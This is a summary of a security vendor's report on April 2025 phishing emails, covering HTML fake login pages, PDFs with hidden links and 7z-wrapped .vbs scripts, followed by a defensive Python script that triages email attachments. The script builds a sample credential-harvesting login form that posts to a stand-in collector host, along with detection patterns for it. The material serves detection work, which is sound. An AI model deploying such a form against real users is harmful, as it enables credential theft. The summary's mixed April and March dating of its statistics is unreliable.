Phishing emails in April 2025 predominantly used HTML scripts and document attachments to impersonate legitimate login pages and lure users into submitting credentials or visiting malicious websites. The report highlights trends in the distribution methods, attachment types, and case analyses related to these phishing campaigns targeting email users globally. #PhishingEmails #EmailSecurity
Key points
- In March 2025, phishing attacks accounted for 79% of malware threats found in email attachments, mostly using HTML scripts to mimic legitimate pages.
- Threat actors embed hyperlinks in documents such as PDFs to redirect victims to phishing websites.
- The report includes classification and examples of phishing emails distributed in Korean, highlighting common subject lines and attachment names.
- Case studies show phishing attachments primarily in script (.vbs), document, and compressed (7z) formats used to distribute fake login pages or malware.
- Scripts and documents contain hidden hyperlinks that direct users to command and control (C2) servers or phishing websites.
- There has been an observed increase in phishing emails distributing script files compressed in 7z archives.
- The full ATIP report offers detailed statistics on attachment extensions, phishing trends, and malware distribution specifics.
MITRE Techniques
- [T1566] Phishing – Threat actors use phishing emails with HTML and document attachments to trick users into entering credentials. (“…users are then prompted to enter their account credentials…”)
- [T1204] User Execution – The phishing emails rely on users opening attachments or clicking embedded hyperlinks within documents to trigger malicious activity. (“…inserting hyperlinks into documents such as PDF files to direct users to phishing websites.”)
- [T1071] Application Layer Protocol – Credentials and data are sent to the threat actor's C2 server through phishing websites. (“…credentials… are then sent to the threat actor’s C2 server…”)
- [T1027] Obfuscated Files or Information – Use of compressed 7z files to distribute obfuscated script files (.vbs). (“…script files (.vbs) were compressed in 7z files and distributed via phishing emails.”)
Indicators of Compromise
- [MD5 Hashes] Malware attachments identified – 07645fdf1ccb6ca4326369296ebd0c33, 0ef8c8c1eee5fe77118d59cd697d7bf8, and 3 more hashes.
- [File Types] Phishing attachments – Script files (.vbs), Document files (PDF), and Compressed archives (7z) used to deliver phishing content or malware.
- [C2 Servers] Mentioned as destinations for credential data exfiltration, though specific IPs/domains are not listed in the summary.
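The three attachment patterns summarised above (HTML fake login pages, PDFs carrying hyperlinks, and 7z archives wrapping script files) can be triaged at the mail gateway with simple static checks. The script below is an added example written for this page, not code from ASEC or the report; it parses a constructed .eml, hashes each attachment against the two MD5 values quoted in the IoC list, and flags HTML password forms, PDF /URI link actions, script extensions and 7z archives. The phish.example URLs, the sample attachments and the extra script/archive extensions beyond .vbs and 7z are assumptions made for the example.

```python
import email
import hashlib
import os
import re
from email import policy
from email.message import EmailMessage

# The two MD5 hashes quoted on the page; the remaining hashes are not in the summary.
KNOWN_BAD_MD5 = {
    "07645fdf1ccb6ca4326369296ebd0c33",
    "0ef8c8c1eee5fe77118d59cd697d7bf8",
}
SCRIPT_EXTS = {".vbs", ".js", ".hta"}   # .vbs is named in the report; .js/.hta are an assumption
ARCHIVE_EXTS = {".7z", ".zip"}          # 7z is named in the report; .zip is an assumption
SEVENZ_MAGIC = b"7z\xbc\xaf\x27\x1c"    # 7z file signature

PDF_URI_RE = re.compile(rb"/URI\s*\(([^)]*)\)")
HTML_FORM_RE = re.compile(rb"<form\b[^>]*\baction\s*=\s*[\"']?([^\"'\s>]+)", re.I)
HTML_PASSWORD_RE = re.compile(rb"type\s*=\s*[\"']?password", re.I)


def classify_attachment(name, data):
    """Return a list of findings for one attachment; an empty list means nothing matched."""
    findings = []
    ext = os.path.splitext(name.lower())[1]
    digest = hashlib.md5(data).hexdigest()
    if digest in KNOWN_BAD_MD5:
        findings.append(f"md5 matches known-bad IoC {digest}")
    if ext in SCRIPT_EXTS:
        findings.append(f"script attachment ({ext})")
    if ext in ARCHIVE_EXTS or data.startswith(SEVENZ_MAGIC):
        findings.append("compressed archive (may wrap a script file)")
    if ext in {".html", ".htm"}:
        if HTML_PASSWORD_RE.search(data):
            findings.append("HTML contains a password field (fake login page)")
        for action in HTML_FORM_RE.findall(data):
            findings.append(f"HTML form posts to {action.decode(errors='replace')}")
    if ext == ".pdf" or data.startswith(b"%PDF"):
        for uri in PDF_URI_RE.findall(data):
            findings.append(f"PDF carries hyperlink to {uri.decode(errors='replace')}")
    return findings


def triage_message(raw):
    """Parse a raw RFC 5322 message and classify every attachment by filename."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    report = {}
    for part in msg.iter_attachments():
        name = part.get_filename() or "<unnamed>"
        report[name] = classify_attachment(name, part.get_payload(decode=True) or b"")
    return report


def build_sample_email():
    """Constructed sample mail carrying the three attachment kinds the report describes."""
    msg = EmailMessage()
    msg["From"] = "billing@example.com"
    msg["To"] = "user@example.org"
    msg["Subject"] = "Invoice"
    msg.set_content("See attached.")
    # Fake login page posting credentials to an external collector (constructed URL).
    fake_login = (b"<html><form action='http://phish.example/collect'>"
                  b"<input name='user'><input type='password' name='pw'></form></html>")
    msg.add_attachment(fake_login, maintype="text", subtype="html", filename="login.html")
    # Minimal PDF with a link annotation pointing at a constructed phishing URL.
    pdf = (b"%PDF-1.4\n1 0 obj << /Type /Annot /Subtype /Link "
           b"/A << /S /URI /URI (http://phish.example/doc) >> >> endobj\n%%EOF")
    msg.add_attachment(pdf, maintype="application", subtype="pdf", filename="invoice.pdf")
    # Placeholder 7z header only; a real archive would carry the .vbs script inside.
    archive = SEVENZ_MAGIC + b"\x00" * 26
    msg.add_attachment(archive, maintype="application", subtype="x-7z-compressed",
                       filename="invoice.7z")
    return msg.as_bytes()


if __name__ == "__main__":
    for filename, findings in triage_message(build_sample_email()).items():
        print(filename, "->", findings or ["no findings"])
```

In production the archive branch should open the 7z and apply `classify_attachment` to each inner member, since the report's point is that the script file is hidden one layer down; the hash check is only as good as the full IoC list, which the summary truncates.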
Read more: https://asec.ahnlab.com/en/87895/